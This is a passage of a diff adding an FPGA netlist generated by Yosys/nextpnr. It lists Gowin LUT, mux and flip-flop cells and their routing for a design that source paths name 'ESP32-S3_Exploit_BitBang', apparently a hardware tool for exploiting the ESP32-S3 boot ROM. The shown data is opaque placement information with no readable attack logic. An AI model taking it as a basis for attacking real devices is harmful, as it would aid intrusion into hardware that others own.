"00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7429 ], + "O": [ 7424 ], + "I1": [ 7438 ], + "I0": [ 7437 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000101100000001" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/LUT3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7434 ], + "I2": [ 7433 ], + "I1": [ 7432 ], + "I0": [ 7431 ], + "F": [ 7428 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000110100000111" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/LUT2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7434 ], + "I2": [ 7433 ], + "I1": [ 7432 ], + "I0": [ 7431 ], + "F": [ 7427 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/MUX2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7429 ], + "O": [ 7423 ], + "I1": [ 7428 ], + "I0": [ 7427 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/MUX1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7425 ], + "O": [ 7420 ], + "I1": [ 7424 ], + "I0": [ 7423 ] + } + }, + "bang_tx_reg_DFFE_Q": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7415 ], + "D": [ 7420 ], + "CLK": [ 7419 ], + "CE": [ 7418 ] + } + }, + "bang_tx_OBUF_O": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X41Y0/IOBA", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:5.12-5.19", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7407 ], + "I": [ 7415 ] + } + } + }, + "netnames": { + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "bits": [ 8069 ] , + "attributes": { + "ROUTING": "X6Y11/COUT0;;1" + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "bits": [ 8067 ] , + "attributes": { + "ROUTING": "X1Y10/COUT0;;1" + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "bits": [ 8065 ] , + "attributes": { + "ROUTING": "X2Y14/COUT0;;1" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_TAIL_ALULC": { + "hide_name": 0, + "bits": [ 8064 ] , + "attributes": { + "ROUTING": "X5Y13/COUT4;;1" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "bits": [ 8063 ] , + "attributes": { + "ROUTING": "X2Y13/COUT0;;1" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_TAIL_ALULC": { + "hide_name": 0, + "bits": [ 8062 ] , + "attributes": { + "ROUTING": "X5Y12/COUT0;;1" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_HEAD_ALULC": { + "hide_name": 0, + "bits": [ 8061 ] , + "attributes": { + "ROUTING": "X1Y12/COUT0;;1" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 8038 ] , + "attributes": { + "ROUTING": "X3Y11/F1;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 8037 ] , + "attributes": { + "ROUTING": "X3Y11/F0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_S0[4]": { + "hide_name": 0, + "bits": [ 8033 ] , + "attributes": { + "ROUTING": "X3Y11/SEL0;X3Y11/SEL0/W261;1;X4Y11/F6;;1;X4Y11/W260;X4Y11/W260/F6;1;X3Y11/SEL2;X3Y11/SEL2/W261;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 8032 ] , + "attributes": { + "ROUTING": "X3Y11/F3;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 8031 ] , + "attributes": { + "ROUTING": "X3Y11/F2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_S0[5]": { + "hide_name": 0, + "bits": [ 8029 ] , + "attributes": { + "ROUTING": "X5Y11/F7;;1;X5Y11/W270;X5Y11/W270/F7;1;X3Y11/X04;X3Y11/X04/W272;1;X3Y11/SEL1;X3Y11/SEL1/X04;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 8028 ] , + "attributes": { + "ROUTING": "X3Y11/OF0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 8027 ] , + "attributes": { + "ROUTING": "X3Y11/OF2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 8023 ] , + "attributes": { + "ROUTING": "X2Y11/F1;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 8022 ] , + "attributes": { + "ROUTING": "X2Y11/F0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 8018 ] , + "attributes": { + "ROUTING": "X2Y11/F3;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 8017 ] , + "attributes": { + "ROUTING": "X2Y11/F2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 8015 ] , + "attributes": { + "ROUTING": "X2Y11/OF0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 8014 ] , + "attributes": { + "ROUTING": "X2Y11/OF2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 8010 ] , + "attributes": { + "ROUTING": "X2Y11/F5;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 8009 ] , + "attributes": { + "ROUTING": "X2Y11/F4;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 8005 ] , + "attributes": { + "ROUTING": "X2Y11/F7;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 8004 ] , + "attributes": { + "ROUTING": "X2Y11/F6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 8002 ] , + "attributes": { + "ROUTING": "X2Y11/OF4;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 8001 ] , + "attributes": { + "ROUTING": "X2Y11/OF6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1": { + "hide_name": 0, + "bits": [ 7999 ] , + "attributes": { + "ROUTING": "X2Y11/OF1;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:163.13-163.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0": { + "hide_name": 0, + "bits": [ 7998 ] , + "attributes": { + "ROUTING": "X2Y11/OF5;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:163.9-163.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0[4]": { + "hide_name": 0, + "bits": [ 7992 ] , + "attributes": { + "ROUTING": "X1Y11/OF30;;1;X2Y11/S230;X2Y11/S230/OF3;1;X2Y12/X08;X2Y12/X08/S231;1;X2Y12/SEL6;X2Y12/SEL6/X08;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7991 ] , + "attributes": { + "ROUTING": "X2Y12/F7;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7990 ] , + "attributes": { + "ROUTING": "X2Y12/F6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_LUT3_F_I2[2]": { + "hide_name": 0, + "bits": [ 7987 ] , + "attributes": { + "ROUTING": "X2Y15/F5;;1;X2Y15/X04;X2Y15/X04/F5;1;X2Y15/C3;X2Y15/C3/X04;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "running_DFF_Q_D[1]": { + "hide_name": 0, + "bits": [ 7981 ] , + "attributes": { + "ROUTING": "X3Y14/EW20;X3Y14/EW20/F7;1;X4Y14/C2;X4Y14/C2/E121;1;X4Y14/XD2;X4Y14/XD2/C2;1;X3Y14/F7;;1;X3Y14/W100;X3Y14/W100/F7;1;X3Y14/B4;X3Y14/B4/W100;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "running_DFF_Q_D[0]": { + "hide_name": 0, + "bits": [ 7980 ] , + "attributes": { + "ROUTING": "X3Y14/F3;;1;X3Y14/X06;X3Y14/X06/F3;1;X3Y14/A4;X3Y14/A4/X06;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "running_DFFS_Q_D": { + "hide_name": 0, + "bits": [ 7978 ] , + "attributes": { + "ROUTING": "X3Y14/F4;;1;X3Y14/XD4;X3Y14/XD4/F4;1" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7974 ] , + "attributes": { + "ROUTING": "X1Y11/F1;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7973 ] , + "attributes": { + "ROUTING": "X1Y11/F0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7969 ] , + "attributes": { + "ROUTING": "X1Y11/F3;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7968 ] , + "attributes": { + "ROUTING": "X1Y11/F2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 7966 ] , + "attributes": { + "ROUTING": "X1Y11/OF0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 7965 ] , + "attributes": { + "ROUTING": "X1Y11/OF2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7961 ] , + "attributes": { + "ROUTING": "X1Y11/F5;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7960 ] , + "attributes": { + "ROUTING": "X1Y11/F4;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7956 ] , + "attributes": { + "ROUTING": "X1Y11/F7;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7955 ] , + "attributes": { + "ROUTING": "X1Y11/F6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 7953 ] , + "attributes": { + "ROUTING": "X1Y11/OF4;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 7952 ] , + "attributes": { + "ROUTING": "X1Y11/OF6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1": { + "hide_name": 0, + "bits": [ 7950 ] , + "attributes": { + "ROUTING": "X1Y11/OF1;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:163.13-163.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0": { + "hide_name": 0, + "bits": [ 7949 ] , + "attributes": { + "ROUTING": "X1Y11/OF5;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:163.9-163.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0[3]": { + "hide_name": 0, + "bits": [ 7947 ] , + "attributes": { + "ROUTING": "X2Y10/EW20;X2Y10/EW20/F7;1;X3Y10/S260;X3Y10/S260/E121;1;X3Y12/D7;X3Y12/D7/S262;1;X2Y10/F7;;1;X2Y11/S260;X2Y11/S260/S121;1;X2Y10/SN20;X2Y10/SN20/F7;1;X2Y12/D7;X2Y12/D7/S261;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0[2]": { + "hide_name": 0, + "bits": [ 7945 ] , + "attributes": { + "ROUTING": "X3Y10/S100;X3Y10/S100/F6;1;X3Y11/S200;X3Y11/S200/S101;1;X3Y12/C7;X3Y12/C7/S201;1;X3Y10/F6;;1;X3Y10/W100;X3Y10/W100/F6;1;X2Y10/S240;X2Y10/S240/W101;1;X2Y12/X05;X2Y12/X05/S242;1;X2Y12/C7;X2Y12/C7/X05;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0[4]": { + "hide_name": 0, + "bits": [ 7941 ] , + "attributes": { + "ROUTING": "X1Y11/OF3;;1;X1Y11/S100;X1Y11/S100/OF3;1;X1Y12/E200;X1Y12/E200/S101;1;X3Y12/X05;X3Y12/X05/E202;1;X3Y12/SEL6;X3Y12/SEL6/X05;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7940 ] , + "attributes": { + "ROUTING": "X3Y12/F7;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7939 ] , + "attributes": { + "ROUTING": "X3Y12/F6;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7935 ] , + "attributes": { + "ROUTING": "X1Y13/F1;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7934 ] , + "attributes": { + "ROUTING": "X1Y13/F0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0[2]": { + "hide_name": 0, + "bits": [ 7932 ] , + "attributes": { + "ROUTING": 